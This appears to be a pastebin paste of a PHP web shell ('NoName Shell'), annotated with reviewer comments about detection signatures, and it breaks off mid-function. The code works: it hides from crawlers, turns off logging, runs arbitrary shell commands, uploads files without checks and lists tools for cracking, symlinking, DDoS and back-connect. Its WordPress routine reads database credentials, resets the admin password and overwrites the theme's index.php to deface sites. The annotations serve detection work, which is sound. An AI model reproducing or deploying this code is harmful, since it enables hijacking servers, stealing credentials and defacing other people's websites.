Guest User

Untitled

a guest
Sep 6th, 2018
text 64.25 KB | None | 0 0
  // Bootstrap of a PHP web shell (the banner printed further down calls it "NoName Shell").
  // The session opened here later carries the access flag, keyed by md5 of the Host header.
  session_start();
  // Error reporting, error display and PHP error logging are all switched off and the
  // execution time limit is lifted. With log_errors at 0 the script's own failures are not
  // written to the PHP error log, so triage has to lean on web-server access logs and
  // file-integrity data instead.
  error_reporting(0);
  set_time_limit(0);
  // set_magic_quotes_runtime() was removed in PHP 7.0. NOTE(review): an undefined-function
  // call is not silenced by @ on PHP 7+, so as pasted this file presumably only runs to
  // completion on PHP 5.x — confirm against the interpreter version of an affected host.
  @set_magic_quotes_runtime(0);
  @clearstatcache();
  @ini_set('error_log',NULL);
  @ini_set('log_errors',0);
  @ini_set('max_execution_time',0);
  @ini_set('output_buffering',0);
  @ini_set('display_errors', 0);
  // These four settings are not read again in the visible part of the file. The literal
  // assignment of 'FilesMan' to $default_action is a stable string for static signatures.
  // NOTE(review): the names match the WSO shell family's configuration header — likely
  // inherited boilerplate, confirm.
  $color = "#00ff00";
  $default_action = 'FilesMan';
  $default_use_ajax = true;
  $default_charset = 'UTF-8';
  // Crawler cloaking: a request whose User-Agent matches any listed name (case-insensitive)
  // receives a bare 404 and the script stops, so the file looks absent to search-engine
  // crawlers and to the listed tools. For triage: a path that answers 404 to a crawler
  // agent and 200 to a browser agent is an indicator in its own right.
  if(!empty($_SERVER['HTTP_USER_AGENT'])) {
  $userAgents = array("Googlebot", "Slurp", "MSNBot", "PycURL", "facebookexternalhit", "ia_archiver", "crawler", "Yandex", "Rambler", "Yahoo! Slurp", "YahooSeeker", "bingbot");
  if(preg_match('/' . implode('|', $userAgents) . '/i', $_SERVER['HTTP_USER_AGENT'])) {
  header('HTTP/1.0 404 Not Found');
  exit;
  }
  }
  22.  
  /**
   * Emits the password prompt page and ends the request.
   *
   * Prints a static HTML document whose only input is a password field named "pass"
   * inside a form that POSTs back to the same URL, then calls exit, so nothing after
   * the call site runs. Takes no parameters and never returns to the caller.
   *
   * Review notes (detection): the page loads its background and logo from third-party
   * hosts (www.exilie.team and i.imgur.com), so a browser rendering it makes outbound
   * requests to them. Those URLs and the title text are fixed strings in the file and
   * can serve as content signatures when scanning a web root.
   */
  function login_shell() {
  ?>
  <html>
  <head>
  <title>Lysteriouss</title>
  <style type="text/css">
  html {
  background: url('https://www.exilie.team/1.png');
  background-size: cover;
  background-attachment: fixed;
  background-repeat: no-repeat;
  color: green;
  }
  header {
  color: green;
  margin: 10px auto;
  }
  input[type=password] {
  width: 250px;
  height: 25px;
  color: red;
  background: #000000;
  border: 1px solid #ffffff;
  padding: 5px;
  margin-left: 20px;
  text-align: center;
  }
  </style>
  </head>
  <header>
  <center><img src="http://i.imgur.com/fW1hCGC.png" width="30%" height="50%"></img></center>
  </header>
  <form method="post">
  <center><input type="password" name="pass"><center>
  </form>
  <?php
  exit;
  }
  // Access gate. The session flag is stored under md5 of the Host header; once set, every
  // later request in that session skips this check.
  // NOTE(review): $auth_pass is not assigned anywhere in the visible part of this file. If it
  // is unset when this line runs, empty($auth_pass) is true, the flag is granted to every
  // visitor and login_shell() is never reached. A host carrying this file should then be
  // treated as reachable by anyone who learns the URL, not only by whoever placed it there.
  // When $auth_pass is set, the POSTed "pass" is checked as an unsalted MD5 using loose ==.
  // The else below binds to the inner if: a wrong or missing password shows the prompt.
  if(!isset($_SESSION[md5($_SERVER['HTTP_HOST'])]))
  if( empty($auth_pass) || ( isset($_POST['pass']) && (md5($_POST['pass']) == $auth_pass) ) )
  $_SESSION[md5($_SERVER['HTTP_HOST'])] = true;
  else
  login_shell();
  66. ?>
  67. <html>
  68. <head>
  69. <title>Lysteriouss</title>
  70. <meta name='author' content='Shun403'>
  71. <meta charset="UTF-8">
  72. <style type='text/css'>
  73. @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
  74. html {
  75. background: url('https://www.exilie.team/2.jpg');
  76. background-size: cover;
  77. background-attachment: fixed;
  78. background-repeat: no-repeat;
  79. color: #ffffff;
  80. font-family: 'Share Tech Mono';
  81. font-size: 12px;
  82. width: 100%;
  83. }
  84. li {
  85. display: inline;
  86. margin: 1px;
  87. padding: 1px;
  88. }
  89.  
  90. #menu a {
  91. padding:2px 10px;
  92. margin:0;
  93. background:#222222;
  94. text-decoration:none;
  95. letter-spacing:2px;
  96. padding: 2px 10px;
  97. margin: 0;
  98. background: #222222;
  99. text-decoration: none;
  100. letter-spacing: 2px;
  101. border-radius: 2px;
  102. border-bottom: 2px solid #B5AFAF;
  103. border-top: 2px solid #B5AFAF;
  104. border-right: 2px solid darkblue;
  105. border-left: 2px solid darkblue;
  106. }
  107. #menu a:hover {
  108. background:#180000;
  109. border-bottom:0px solid #333333;
  110. border-top:0px solid #333333;
  111. }
  112. table tr:first-child{
  113. background: red;
  114. text-align: center;
  115. color: white;
  116. }
  117. table, th, td {
  118. border-collapse:collapse;
  119. font-family: Tahoma, Geneva, sans-serif;
  120. background: transparent;
  121. font-family: 'Share Tech Mono';
  122. font-size: 13px;
  123. }
  124. .table_home, .th_home, .td_home {
  125. border: 1px solid blue;
  126. }
  127. th {
  128. padding: 10px;
  129. }
  130. a {
  131. color: #ffffff;
  132. text-decoration: none;
  133. }
  134. a:hover {
  135. color: blue;
  136. text-decoration: underline;
  137. }
  138. b {
  139. color: blue;
  140. }
  141. input[type=text], input[type=password],input[type=submit] {
  142. background: transparent;
  143. color: #ffffff;
  144. border: 1px solid #ffffff;
  145. margin: 5px auto;
  146. padding-left: 5px;
  147. font-family: 'Share Tech Mono';
  148. font-size: 13px;
  149. }
  150. input[type=submit] {
  151. background: transparent;
  152. color: #ffffff;
  153. border: 1px solid #ffffff;
  154. margin: 5px auto;
  155. padding-left: 5px;
  156. font-family: 'Share Tech Mono';
  157. font-size: 13px;
  158. cursor:pointer;
  159. }
  160. textarea {
  161. border: 1px solid #ffffff;
  162. width: 100%;
  163. height: 400px;
  164. padding-left: 5px;
  165. margin: 10px auto;
  166. resize: none;
  167. background: transparent;
  168. color: #ffffff;
  169. font-family: 'Share Tech Mono';
  170. font-size: 13px;
  171. }
  172. select {
  173. width: 152px;
  174. background: #000000;
  175. color: blue;
  176. border: 1px solid #ffffff;
  177. margin: 5px auto;
  178. padding-left: 5px;
  179. font-family: 'Share Tech Mono';
  180. font-size: 13px;
  181. }
  182. option:hover {
  183. background: blue;
  184. color: #000000;
  185. }
  186. .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
  187. .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
  188. .infoweb {
  189. border-right: 1px solid #00FFFF;
  190. }
  191. </style>
  192. </head>
  193. <?php
  194.  
  /**
   * Wraps a label in a <font> tag whose colour reflects whether a path is writable.
   *
   * @param string $dir  path tested with is_writable()
   * @param string $perm text to wrap; inserted as-is, without HTML escaping
   * @return string blue markup when the path is writable, red markup otherwise
   */
  function w($dir,$perm) {
      $tint = is_writable($dir) ? "blue" : "red";
      return "<font color=" . $tint . ">" . $perm . "</font>";
  }
  /**
   * Wraps a label in a <font> tag whose colour reflects whether a path is readable.
   *
   * @param string $dir  path tested with is_readable()
   * @param string $perm text to wrap; inserted as-is, without HTML escaping
   * @return string blue markup when the path is readable, red markup otherwise
   */
  function r($dir,$perm) {
      $tint = is_readable($dir) ? "blue" : "red";
      return "<font color=" . $tint . ">" . $perm . "</font>";
  }
  /**
   * Runs $cmd through the first PHP process-execution function that exists and returns
   * whatever it printed.
   *
   * Order tried: system(), exec(), passthru(), shell_exec(), each gated on function_exists().
   * system() and passthru() output is captured with output buffering. In the exec() branch
   * the output lines are joined with no separator, so line breaks are lost there. If none
   * of the four functions exists, control falls off the end and the result is null.
   *
   * $cmd reaches the shell unmodified. The only callers visible in this part of the file
   * pass fixed strings (the wget/perl/python probes). NOTE(review): the menu links to a
   * do=cmd action whose handler is outside this view; presumably it passes request input
   * here — confirm.
   *
   * Review notes (hardening and detection): because of the fallback chain, a
   * disable_functions setting that names only some of these four functions does not stop
   * this wrapper; all four have to be covered. At runtime the trace is child processes
   * started by the web-server / PHP worker account.
   *
   * @param string $cmd command line handed to the shell
   * @return string|null captured output, or null when no execution function is available
   */
  function exe($cmd) {
  if(function_exists('system')) {
  @ob_start();
  @system($cmd);
  $buff = @ob_get_contents();
  @ob_end_clean();
  return $buff;
  } elseif(function_exists('exec')) {
  @exec($cmd,$results);
  $buff = "";
  // Lines are appended back to back; the newline that separated them is not restored.
  foreach($results as $result) {
  $buff .= $result;
  } return $buff;
  } elseif(function_exists('passthru')) {
  @ob_start();
  @passthru($cmd);
  $buff = @ob_get_contents();
  @ob_end_clean();
  return $buff;
  } elseif(function_exists('shell_exec')) {
  $buff = @shell_exec($cmd);
  return $buff;
  }
  }
  /**
   * Renders a file's mode as a ten-character, ls-style string: one type flag followed by
   * the owner, group and world rwx triads (with s/S and t/T for the special bits).
   *
   * @param string $file path handed to fileperms()
   * @return string for example "-rw-r--r--"; the type flag is 'u' when no known mask matches
   */
  function perms($file){
      $mode = fileperms($file);

      // File-type masks, tested in this order; the first full match wins.
      $kinds = array(
          0xC000 => 's', // socket
          0xA000 => 'l', // symbolic link
          0x8000 => '-', // regular file
          0x6000 => 'b', // block special
          0x4000 => 'd', // directory
          0x2000 => 'c', // character special
          0x1000 => 'p', // FIFO pipe
      );
      $text = 'u'; // unknown unless one of the masks matches
      foreach ($kinds as $mask => $flag) {
          if (($mode & $mask) == $mask) {
              $text = $flag;
              break;
          }
      }

      // Per triad: read bit, write bit, execute bit, special bit,
      // letter for special+execute, letter for special without execute.
      $triads = array(
          array(0x0100, 0x0080, 0x0040, 0x0800, 's', 'S'), // owner, setuid
          array(0x0020, 0x0010, 0x0008, 0x0400, 's', 'S'), // group, setgid
          array(0x0004, 0x0002, 0x0001, 0x0200, 't', 'T'), // world, sticky
      );
      foreach ($triads as $bits) {
          $text .= ($mode & $bits[0]) ? 'r' : '-';
          $text .= ($mode & $bits[1]) ? 'w' : '-';
          if ($mode & $bits[2]) {
              $text .= ($mode & $bits[3]) ? $bits[4] : 'x';
          } else {
              $text .= ($mode & $bits[3]) ? $bits[5] : '-';
          }
      }
      return $text;
  }
  /**
   * Formats a byte count with a binary unit suffix.
   *
   * Values of at least 1 GiB, 1 MiB or 1 KiB are divided down and shown with two
   * decimals; anything smaller is returned unformatted with a " B" suffix.
   *
   * @param int|float $s size in bytes
   * @return string for example "1.50 MB" or "512 B"
   */
  function hdd($s) {
      // Largest unit first so the first threshold reached decides the suffix.
      $units = array(
          ' GB' => 1073741824,
          ' MB' => 1048576,
          ' KB' => 1024,
      );
      foreach ($units as $suffix => $size) {
          if ($s >= $size) {
              return sprintf('%1.2f', $s / $size) . $suffix;
          }
      }
      return $s . ' B';
  }
  /**
   * Returns the text found between two delimiters ("ambil kata" is Indonesian for "take word").
   *
   * The result starts right after the first occurrence of $kata1 and ends before the
   * first occurrence of $kata2 that follows it.
   *
   * @param string $param text to search
   * @param string $kata1 opening delimiter
   * @param string $kata2 closing delimiter
   * @return string|false the enclosed text, or FALSE when either delimiter is absent from $param
   */
  function ambilKata($param, $kata1, $kata2){
      $first = strpos($param, $kata1);
      if ($first === FALSE || strpos($param, $kata2) === FALSE) {
          return FALSE;
      }
      $from = $first + strlen($kata1);
      $to = strpos($param, $kata2, $from);
      return substr($param, $from, $to - $from);
  }
  // Legacy input normalisation: when magic quotes are on, the added slashes are stripped
  // from $_POST recursively. get_magic_quotes_gpc() was removed in PHP 8.0, another sign
  // that this file was written for old interpreter versions.
  if(get_magic_quotes_gpc()) {
  function idx_ss($array) {
  return is_array($array) ? array_map('idx_ss', $array) : stripslashes($array);
  }
  $_POST = idx_ss($_POST);
  }

  // Same error/log suppression and time-limit removal as at the top of the file, repeated.
  error_reporting(0);
  @ini_set('error_log',NULL);
  @ini_set('log_errors',0);
  @ini_set('max_execution_time',0);
  @set_time_limit(0);
  @set_magic_quotes_runtime(0);
  // The working directory is taken directly from the "dir" query parameter; nothing here
  // restricts which path may be chosen. Backslashes are normalised to forward slashes and
  // the path is split into segments for the breadcrumb printed later.
  if(isset($_GET['dir'])) {
  $dir = $_GET['dir'];
  chdir($dir);
  } else {
  $dir = getcwd();
  }
  $dir = str_replace("\\","/",$dir);
  $scdir = explode("/", $dir);
  // Host inventory shown in the banner. hdd() returns formatted text, so the subtraction
  // below operates on strings such as "1.00 GB" rather than byte counts.
  $freespace = hdd(disk_free_space("/"));
  $total = hdd(disk_total_space("/"));
  $used = $total - $freespace;
  $sm = (@ini_get(strtolower("safe_mode")) == 'on') ? "<font color=red>ON</font>" : "<font color=blue>OFF</font>";
  $ds = @ini_get("disable_functions");
  $mysql = (function_exists('mysql_connect')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  $curl = (function_exists('curl_version')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  // Every page load runs these three commands through exe(). A web-server or PHP worker
  // account starting "wget --help", "perl --help" and "python --help" back to back is a
  // distinctive pattern in process-creation telemetry.
  $wget = (exe('wget --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  $perl = (exe('perl --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  $python = (exe('python --help')) ? "<font color=blue>ON</font>" : "<font color=red>OFF</font>";
  $show_ds = (!empty($ds)) ? "<font color=red>$ds</font>" : "<font color=blue>NONE</font>";
  // Account the script runs as: POSIX lookups when the extension is present, otherwise the
  // script owner's name and ids with the group name left as "?".
  if(!function_exists('posix_getegid')) {
  $user = @get_current_user();
  $uid = @getmyuid();
  $gid = @getmygid();
  $group = "?";
  } else {
  $uid = @posix_getpwuid(posix_geteuid());
  $gid = @posix_getgrgid(posix_getegid());
  $user = $uid['name'];
  $uid = $uid['uid'];
  $group = $gid['name'];
  $gid = $gid['gid'];
  }
  // Banner: prints the inventory collected above (uname, interpreter availability, disk
  // figures, account, disabled functions, safe mode) followed by HOME / KILL / LOGOUT links.
  // The literal "NoName Shell" heading and the link targets ?shell&do=kill and
  // ?byee&do=logout are fixed strings, usable as response-body and access-log signatures.
  // NOTE(review): the handlers for do=kill and do=logout are outside this view.
  ECHO "<BR>";
  echo "<center><font size='20px' color='red'>NoName Shell</font>";
  echo "<br>";
  echo "System: ".php_uname()."<br>";
  echo "MySQL: $mysql | Perl: $perl | Python: $python | WGET: $wget | CURL: $curl <br>";
  echo "Storage Space: <font color=blue>$used</font> / <font color=blue>$total</font> ( Free: <font color=blue>$freespace</font> )<br>";
  echo "User: ".$user." (".$uid.") Group: ".$group." (".$gid.")<br>";
  echo "Disable Functions: $show_ds<br>";
  echo "Safe Mode: $sm<br>";
  echo "&nbsp;<a href='?' style='border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>H O M E</a>&nbsp;<a href='?shell&do=kill' style='border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>K I L L </a>&nbsp;<a href='?byee&do=logout' style='color:red;border:2px solid #0000ff;width:80px;padding:0px 8px 0px 8px;'>L O G O U T</a>";
  // Closes a cell and table that are not opened in the visible part of the file.
  echo "</td></table>";
  // Action menu. Every link re-requests this script as ?dir=<current dir>&do=<action>.
  // The action names are fixed strings, so they appear verbatim in web-server access logs
  // and make practical hunting terms for the query string (do=mass_deface, do=cpanel,
  // do=backconnect and the rest listed below). Most handlers are outside this view.
  // $dir is interpolated into the markup without HTML or URL escaping.
  echo "<div id='menu'>";
  echo "<hr color='red'>";
  echo "<hr color='blue'>";
  echo "<center>";
  echo "<ul>";
  echo "<li> <a href='?dir=$dir&do=upload'>Upload</a> </li>";
  echo "<li> <a href='?dir=$dir&do=cmd'>Command</a> </li>";
  echo "<li> <a href='?dir=$dir&do=mass_deface'>Mass Tools</a> </li>";
  echo "<li> <a href='?dir=$dir&do=config'>Config</a> </li>";
  echo "<li> <a href='?dir=$dir&do=configv2'>Config V.2</a> </li>";
  echo "<li> <a href='?dir=$dir&do=symconfig'>SymConfig</a> </li>";
  echo "<li> <a href='?dir=$dir&do=jumping'>Jumping</a> </li>";
  echo "<li> <a href='?dir=$dir&do=cpanel'>CPanel Crack</a> </li>";
  echo "<li> <a href='?dir=$dir&do=symlink'>Symlink</a></li>";
  echo "<li> <a href='?dir=$dir&do=symlink2'>Symlink V.2</a> </li>";
  echo "<li> <a href='?dir=$dir&do=zoneh'>Zone-H</a> </li>";
  echo "<li> <a href='?dir=$dir&do=defacerid'>Defacer.id</a> </li><br><br>";
  echo "<li> <a href='?dir=$dir&do=vhost'>Bypass vHost</a> </li>";
  echo "<li> <a href='?dir=$dir&do=auto_edit_user'>Auto Edit User</a> </li>";
  echo "<li> <a href='?dir=$dir&do=auto_dwp'>Auto Deface WordPress</a> </li>";
  echo "<li> <a href='?dir=$dir&do=auto_dwp2'>WordPress Auto Deface V.2</a> </li>";
  echo "<li> <a href='?dir=$dir&do=auto_wp'>Auto Edit Title WordPress</a> </li>";
  echo "<li> <a href='?dir=$dir&do=decode'>Encode/Decode</a> </li>";
  echo "<li> <a href='?dir=$dir&do=smtp'>SMTP Grabber</a> </li><br><br>";
  echo "<li> <a href='?dir=$dir&do=vb'>VB Index Changer</a> </li>";
  echo "<li> <a href='?dir=$dir&do=multiconfig'>Multi Config</a> </li>";
  echo "<li> <a href='?dir=$dir&do=dbdump'>DB Dump</a> </li>";
  echo "<li> <a href='?dir=$dir&do=code'>Inject Code</a> </li>";
  echo "<li> <a href='?dir=$dir&do=passwbypass'>Bypass Etc/Passw</a> </li>";
  echo "<li> <a href='?dir=$dir&do=csrfup'>Csrf Exploiter</a> </li>";
  echo "<li> <a href='?dir=$dir&do=hijack_wp'>Wp Auto Hijack</a> </li>";
  echo "<li> <a href='?dir=$dir&do=cpftp_auto'>Cpanel/Ftp Auto Deface</a></li><br><br>";
  echo "<li> <a href='?dir=$dir&do=cgi'>CGI Telnet</a> </li>";
  echo "<li> <a href='?dir=$dir&do=adminer'>Adminer</a> </li>";
  echo "<li> <a href='?dir=$dir&do=fake_root'>Fake Root</a> </li>";
  echo "<li> <a href='?dir=$dir&do=ddosattack'>DDoS</a> </li>";
  echo "<li> <a href='?dir=$dir&do=hashid'>HashID</a> </li>";
  echo "<li> <a href='?dir=$dir&do=reverse'>ReverseIP</a> </li>";
  echo "<li> <a href='?dir=$dir&do=adfin'>Admin Finder</a> </li>";
  echo "<li> <a href='?dir=$dir&do=whmcsdecod'>WHMCS Decoder</a> </li>";
  echo "<li> <a href='?dir=$dir&do=krdp_shell'>K-RDP Shell</a> </li>";
  echo "<li> <a href='?dir=$dir&do=hash'>Hash Generate</a> </li><br><br>";
  echo "<li> <a href='?dir=$dir&do=ports'>Port Scanner</a></li>";
  echo "<li> <a href='?dir=$dir&do=domains'>Domains Viewer</a></li>";
  echo "<li> <a href='?dir=$dir&do=network'>Back Connect</a> </li>";
  echo "<li> <a href='?dir=$dir&do=backconnect'>Back Connect V.2</a> </li>";
  echo "<li> <a href='?dir=$dir&do=bypass'>Disable Functions</a> </li>";
  echo "<li> <a href='?dir=$dir&do=ngindexx'>NginDexer</a> </li>";
  echo "<li> <a href='?dir=$dir&do=twitterbf'>BruteForce Twitter</a></li><br><br>";
  echo "<li> <a href='?dir=$dir&do=contact'>Contact Me</a></li>";
  echo "<li> <a href='?dir=$dir&do=about'>About Me</a></li>";
  echo "</ul>";
  echo "</center>";
  echo "<hr color='blue'>";
  echo "<hr color='red'>";
  echo "</div>";
  echo "<br>";
  // Breadcrumb for the current directory: each path segment becomes a link whose ?dir=
  // value is the path rebuilt from the first segment up to that one. Segments come from
  // the request-controlled $dir and are written into the markup without escaping.
  echo "Current DIR: ";
  foreach($scdir as $c_dir => $cdir) {
  echo "<a href='?dir=";
  // Re-join segments 0..$c_dir with "/" to form the link target for this level.
  for($i = 0; $i <= $c_dir; $i++) {
  echo $scdir[$i];
  if($i != $c_dir) {
  echo "/";
  }
  }
  echo "'>$cdir</a>/";
  }
  // Mode string of the current directory, coloured by whether it is writable.
  echo "[ ".w($dir, perms($dir))." ]";
  echo "<br>";
  echo "<br>";
  // Upload action (first branch of the do= dispatch chain; the chain continues past this
  // block). The uploaded temp file is copied under its client-supplied name, unchanged,
  // either into the current directory (tipe_upload = "biasa", Indonesian for "ordinary")
  // or into DOCUMENT_ROOT. No extension, type or path check is applied to the name, and
  // copy() is used rather than move_uploaded_file().
  // Review notes (detection): the request is a multipart POST to ?do=upload carrying the
  // fields tipe_upload, ix_file and upload. On disk, the result is a file created by the
  // web-server account in the shell's working directory or the document root at the time
  // of that request.
  if($_GET['do'] == 'upload') {
  echo "<center>";
  if($_POST['upload']) {
  if($_POST['tipe_upload'] == 'biasa') {
  if(@copy($_FILES['ix_file']['tmp_name'], "$dir/".$_FILES['ix_file']['name']."")) {
  $act = "<font color=blue>Uploaded!</font> at <i><b>$dir/".$_FILES['ix_file']['name']."</b></i>";
  } else {
  $act = "<font color=red>failed to upload file</font>";
  }
  } else {
  // Any other tipe_upload value targets the document root, so the file becomes
  // reachable at http://<Host header>/<filename>, which is the link printed on success.
  $root = $_SERVER['DOCUMENT_ROOT']."/".$_FILES['ix_file']['name'];
  $web = $_SERVER['HTTP_HOST']."/".$_FILES['ix_file']['name'];
  if(is_writable($_SERVER['DOCUMENT_ROOT'])) {
  if(@copy($_FILES['ix_file']['tmp_name'], $root)) {
  $act = "<font color=blue>Uploaded!</font> at <i><b>$root -> </b></i><a href='http://$web' target='_blank'>$web</a>";
  } else {
  $act = "<font color=red>failed to upload file</font>";
  }
  } else {
  $act = "<font color=red>failed to upload file</font>";
  }
  }
  }
  // The form is printed on every visit to this action; $act is only set after a POST.
  echo "Upload File:
  <form method='post' enctype='multipart/form-data'>
  <input type='radio' name='tipe_upload' value='biasa' checked>Biasa [ ".w($dir,"Writeable")." ]
  <input type='radio' name='tipe_upload' value='home_root'>home_root [ ".w($_SERVER['DOCUMENT_ROOT'],"Writeable")." ]<br>
  <input type='file' name='ix_file'>
  <input type='submit' value='upload' name='upload'>
  </form>";
  echo $act;
  echo "</center>";
  457. } elseif($_GET['do'] == 'ngindexx') {
  458. {error_reporting(0);function entre2v2($text,$marqueurDebutLien,$marqueurFinLien,$i=1){$ar0=explode($marqueurDebutLien, $text);$ar1=explode($marqueurFinLien, $ar0[$i]);return trim($ar1[0]);}function randomt() {$chars = "abcdefghijkmnopqrstuvwxyz023456789";srand((double)microtime()*1000000);$i = 0;$pass = '';while ($i <= 7) {$num = rand() % 33;$tmp = substr($chars, $num, 1);$pass = $pass . $tmp;$i++;}return $pass;}function index_changer_wp($conf, $content) {$output = '';$dol = '$';$go = 0;$username = entre2v2($conf,"define('DB_USER', '","');");$password = entre2v2($conf,"define('DB_PASSWORD', '","');");$dbname = entre2v2($conf,"define('DB_NAME', '","');");$prefix = entre2v2($conf,$dol."table_prefix = '","'");$host = entre2v2($conf,"define('DB_HOST', '","');");$link=mysql_connect($host,$username,$password);if($link) {mysql_select_db($dbname,$link) ;$dol = '$';$req1 = mysql_query("UPDATE `".$prefix."users` SET `user_login` = 'admin',`user_pass` = '4297f44b13955235245b2497399d7a93' WHERE `ID` = 1");} else {$output.= "[-] DB Error<br />";}if($req1) {$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='home'");$data = mysql_fetch_array($req);$site_url=$data["option_value"]; $req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='template'");$data = mysql_fetch_array($req);$template = $data["option_value"];$req = mysql_query("SELECT * from `".$prefix."options` WHERE option_name='current_theme'");$data = mysql_fetch_array($req);$current_theme = $data["option_value"];$useragent="Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1; .NET CLR 1.1.4322; Alexa Toolbar; .NET CLR 2.0.50727)";$url2=$site_url."/wp-login.php";$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"log=admin&pwd=123123&rememberme=forever&wp-submit=Log In&testcookie=1");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 
0);curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 10);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);$pos = strpos($buffer,"action=logout");if($pos === false) {$output.= "[-] Login Error<br />";} else {$output.= "[+] Login Successful<br />";$go = 1;}if($go) {$cond = 0;$url2=$site_url."/wp-admin/theme-editor.php?file=/themes/".$template.'/index.php&theme='.urlencode($current_theme).'&dir=theme';curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"/index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Updated Successfuly<br />";$hk = explode('public_html',$_file);$output.= '[+] Deface 
'.file_get_contents($site_url.str_replace('/blog','',$hk[1]));$cond = 1;}} else {$url2=$site_url.'/wp-admin/theme-editor.php?file=index.php&theme='.$template;curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 0);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer0 = curl_exec($ch);$_wpnonce = entre2v2($buffer0,'<input type="hidden" id="_wpnonce" name="_wpnonce" value="','" />');$_file = entre2v2($buffer0,'<input type="hidden" name="file" value="','" />');if(substr_count($_file,"index.php") != 0){$output.= "[+] index.php loaded in Theme Editor<br />";$url2=$site_url."/wp-admin/theme-editor.php";curl_setopt($ch, CURLOPT_URL, $url2);curl_setopt($ch, CURLOPT_POST, 1);curl_setopt($ch, CURLOPT_POSTFIELDS,"newcontent=".base64_decode($content)."&action=update&file=".$_file."&theme=".$template."&_wpnonce=".$_wpnonce."&submit=Update File");curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);curl_setopt($ch, CURLOPT_HEADER, 0);curl_setopt($ch, CURLOPT_USERAGENT, $useragent);curl_setopt($ch, CURLOPT_COOKIEJAR, "COOKIE.txt");curl_setopt($ch, CURLOPT_COOKIEFILE, "COOKIE.txt");$buffer = curl_exec($ch);curl_close($ch);$pos = strpos($buffer,'<div id="message" class="updated">');if($pos === false) {$output.= "[-] Updating Index.php Error<br />";} else {$output.= "[+] Index.php Template Updated Successfuly<br />";$output.= '[+] Deface '.file_get_contents($site_url.'/wp-content/themes/'.$template.'/index.php');$cond = 1;}} else {$output.= "[-] index.php can not load in Theme Editor<br />";}}}} else {$output.= "[-] DB Error<br />";}global $base_path;unlink($base_path.'COOKIE.txt');return array('cond'=>$cond, 'output'=>$output);}function index_changer_joomla($conf, $content, $domain) {$doler = '$';$username = entre2v2($conf, $doler."user = '", 
